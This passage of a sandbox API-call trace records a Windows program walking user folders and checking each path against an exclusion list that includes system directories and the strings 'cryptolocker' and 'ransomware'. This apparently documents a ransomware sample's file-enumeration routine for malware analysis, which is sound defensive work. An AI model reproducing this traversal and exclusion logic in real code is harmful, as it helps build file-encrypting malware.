psz1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\system32\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\system\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Temp" [0089.802] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0089.802] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0089.802] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0089.802] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0089.802] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0089.802] GetProcessHeap () returned 0xe30000 [0089.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a68 | out: hHeap=0xe30000) returned 1 [0089.802] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0089.802] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0089.802] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0089.802] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0089.802] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0089.802] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Roaming", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\system32\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\system\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\local\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\boot\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\perflogs\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\programdata\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\drivers\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\wsus\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="crypt_detect") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="cryptolocker") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="ransomware") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\WINDOWS") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.803] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\Program Files") returned 0x0 [0089.803] GetProcessHeap () returned 0xe30000 [0089.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xec7a68 [0089.803] StrCpyNW (in: psz1=0xec7a68, psz2="C:\\Users\\Default\\AppData\\Roaming", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0089.803] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Roaming", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0089.803] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20b0 [0089.803] StrCmpW (psz1=".", psz2=".") returned 0 [0089.803] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.803] StrCmpW (psz1="..", psz2=".") returned 1 [0089.803] StrCmpW (psz1="..", psz2="..") returned 0 [0089.803] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0089.803] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0089.803] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0089.803] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0089.804] FindClose (in: hFindFile=0xec20b0 | out: hFindFile=0xec20b0) returned 1 [0089.804] GetProcessHeap () returned 0xe30000 [0089.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a68 | out: hHeap=0xe30000) returned 1 [0089.804] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0089.804] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0089.804] GetProcessHeap () returned 0xe30000 [0089.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.804] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0089.804] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0089.804] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0089.804] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0089.804] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0089.804] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0089.804] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0089.804] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0089.804] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0089.804] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.804] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.804] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Desktop", cchMax=1058 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0089.804] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="crypt_detect") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="cryptolocker") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="ransomware") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.805] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0089.805] GetProcessHeap () returned 0xe30000 [0089.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xec65a0 [0089.805] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Desktop", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0089.805] StrNCatW (in: psz1="C:\\Users\\Default\\Desktop", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0089.805] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0089.805] StrCmpW (psz1=".", psz2=".") returned 0 [0089.805] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.805] StrCmpW (psz1="..", psz2=".") returned 1 [0089.805] StrCmpW (psz1="..", psz2="..") returned 0 [0089.805] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.805] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0089.805] GetProcessHeap () returned 0xe30000 [0089.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.805] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0089.805] StrCmpW (psz1="Documents", psz2=".") returned 1 [0089.805] StrCmpW (psz1="Documents", psz2="..") returned 1 [0089.805] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.805] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.805] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Documents", cchMax=1058 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\boot\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="crypt_detect") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="cryptolocker") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="ransomware") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.806] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0089.806] GetProcessHeap () returned 0xe30000 [0089.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec65a0 [0089.806] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Documents", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0089.806] StrNCatW (in: psz1="C:\\Users\\Default\\Documents", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0089.806] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0089.807] StrCmpW (psz1=".", psz2=".") returned 0 [0089.807] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.807] StrCmpW (psz1="..", psz2=".") returned 1 [0089.807] StrCmpW (psz1="..", psz2="..") returned 0 [0089.807] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0089.807] StrCmpW (psz1="My Music", psz2=".") returned 1 [0089.807] StrCmpW (psz1="My Music", psz2="..") returned 1 [0089.807] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0089.807] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0089.807] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0089.807] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0089.808] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0089.808] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0089.808] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0089.808] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0089.808] GetProcessHeap () returned 0xe30000 [0089.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.808] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0089.808] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0089.808] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0089.808] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.809] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: 